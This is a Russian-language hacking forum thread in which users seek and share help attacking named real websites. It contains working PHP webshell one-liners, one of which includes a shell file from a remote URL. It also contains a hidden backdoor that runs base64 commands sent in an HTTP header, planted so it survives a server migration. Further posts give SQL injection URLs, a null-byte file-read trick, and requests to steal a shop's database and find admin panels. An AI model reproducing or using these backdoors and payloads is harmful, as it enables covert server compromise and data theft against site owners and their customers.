Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. fervex

    fervex New Member

    Joined:
    12 Nov 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    Здравствуйте! )) :)

    есть шелл на сервере (сервер 1), админы хотят перейти на сервер 2 и взять с собой туда лишь несколько PHP файлов.

    Подскажите, какой код нужно внедрить в PHP файлы, чтобы он был не сильно заметен, и потом через него можно было залить шелл уже на новом сервере?

    Спасибо! :)
     
  2. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    вероятно в скрипте несколько sql-запросов с разным числом столбцов..а может еще что-то

    а вот здесь все просто
    Code:
    http://www.gamingtrend.com/Reviews/review/review.php?ReviewID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
     
  3. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Code:
    system($_GET['d']);
    или
    Code:
    include($_GET['s']);
    а потом
    site.ru/test.php?d=ls
    site.ru/test.php?s=http://www.google.com/shell.txt
     
  4. fervex

    fervex New Member

    Joined:
    12 Nov 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    спасибо!

    они могут не-локальный include отключить
    и отключить system

    есть ещё варианты?
     
  5. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    http://raz0r.name/releases/mega-reliz-samyj-korotkij-shell/
    тогда просто eval($_GET['c']); а потом уже разберешься, что отключено и как с этим бороться
     
    1 person likes this.
  6. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    может на сервере отключен register_globals? попробуй так:
    http://nkregion.kz/news2/plugins/wacko/highlight/html.php?text=%3C!--{${phpinfo()}}--%3E
     
    1 person likes this.
  7. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    да ..а есчё можно как у сплойта от СМФ
    Code:
    if(isset($_SERVER['HTTP_SHELL'])) { print otake;eval(base64_decode($_SERVER['HTTP_SHELL']));print otake;exit(); }
    а патом пасылать
    PHP:
    GET http://site.ru/index.php HTTP/1.0
    Hostwww.site.ru
    Prama
    no-cache  
    Accept
    text/htmlimage/pngimage/jpegimage/gifimage/x-xbitmap, */*
    Shell: c3lzdGVtKCdscycpOw==
    Например так...
     
    #3607 DimOnOID, 11 Nov 2008
    Last edited: 11 Nov 2008
    1 person likes this.
  8. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    http://www.medicinenet.com/script/main/art.asp?articlekey=47344+and+1=@@version--

    Error converting data type varchar to int

    как сделать чтоб типы совпали и я узнал версию?
     
  9. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    2Raz0r

    А ты сам попробуй, у меня лично ни так ни так не работает
     
  10. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    значит версия двига в твоем случае отличается или стоит патч
    SQL-инъекция в хранимой процедуре:
    http://www.medicinenet.com/script/main/art.asp?articlekey=47344'--
    К сожалению, не только подогнать тип данных не получится, но и вообще внедрить SQL-код.
     
  11. Goodwin_

    Goodwin_ Elder - Старейшина

    Joined:
    29 May 2008
    Messages:
    61
    Likes Received:
    6
    Reputations:
    0
    что можно сделать, если я могу перемещаться по каталогам с помощью скрипта и просматривать текстовые файлы с помощью скрипта на сайте
    http://www.site/xxx/show.asp?doc=abc&dir=cba
    если в doc писать например show.asp то пишет "нет запрашиваемой страницы"
    если просто show то пишет " filename=bla\bla\bla\show.txt
    файл не найден"
     
  12. prescott

    prescott Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    132
    Likes Received:
    43
    Reputations:
    5
    Есть сервер: http://formz.ru/

    Судя по заголовкам работает на Server: CherryPy/3.0.1 .

    Судя по всему, опять же, есть sql-inj:
    https://formz.ru/nb/public/faq/view?table.question_list.limit=[sql]

    У кого есть идеи по продолжению? Поиск уязвимостей сервера по гуглу ничего путнего не дал. И как можно определить какая БД установлена на сайте?
     
  13. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    нуллбайтом отсечь расширение и читать любые файлы:
    http://www.site/xxx/show.asp?doc=abc&dir=cba.php%00
     
  14. edem

    edem New Member

    Joined:
    9 Feb 2007
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте я хотел бы поинтересоваться
    как можно стянуть базу контент интерне магазина ?
    она сохраняется в файле с росшерением .CSV
    Но как её вытянуть от туда немогу понять.
    http://www.sex-shop.ua/
    Вот магазин помогите пожалуйста.
     
  15. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    http://ava4me.ru/ Кто знает чтоза скрипт и где его взять?
     
  16. prescott

    prescott Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    132
    Likes Received:
    43
    Reputations:
    5
    товарищи, неужели никто ничего не сможет сказать по этому субъекту?
     
  17. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Да судя по ошибке так и есть
    Это судя по чему? Я не увидел, и даже если-бы она там была, это limit, скорее всего после order by, а это дохлый номер
     
    1 person likes this.
  18. prescott

    prescott Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    132
    Likes Received:
    43
    Reputations:
    5
    Судя по тому, что другие параметры на сайте интвалятся, а этот выдает критическую ошибку, хотя конечно не факт.

    А вот про то что в лимит инъекция "дохлый номер" это ты совсем зря. Просто сервер БД видимо какой то редкий.
     
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Вот инъекция в лимите
    http://www.contactphoto.com/archive.php?search=&limit=1

    Сдесь обычный мускул, ошибка выплёвывает весь запрос, что упрощает дело. Если это возможно, хотелось бы увидить реализацию
     
  20. mishgan80

    mishgan80 New Member

    Joined:
    18 Jul 2007
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    мужики помогите, где здесь админка - www.loretta.ru
     
Thread Status:
Not open for further replies.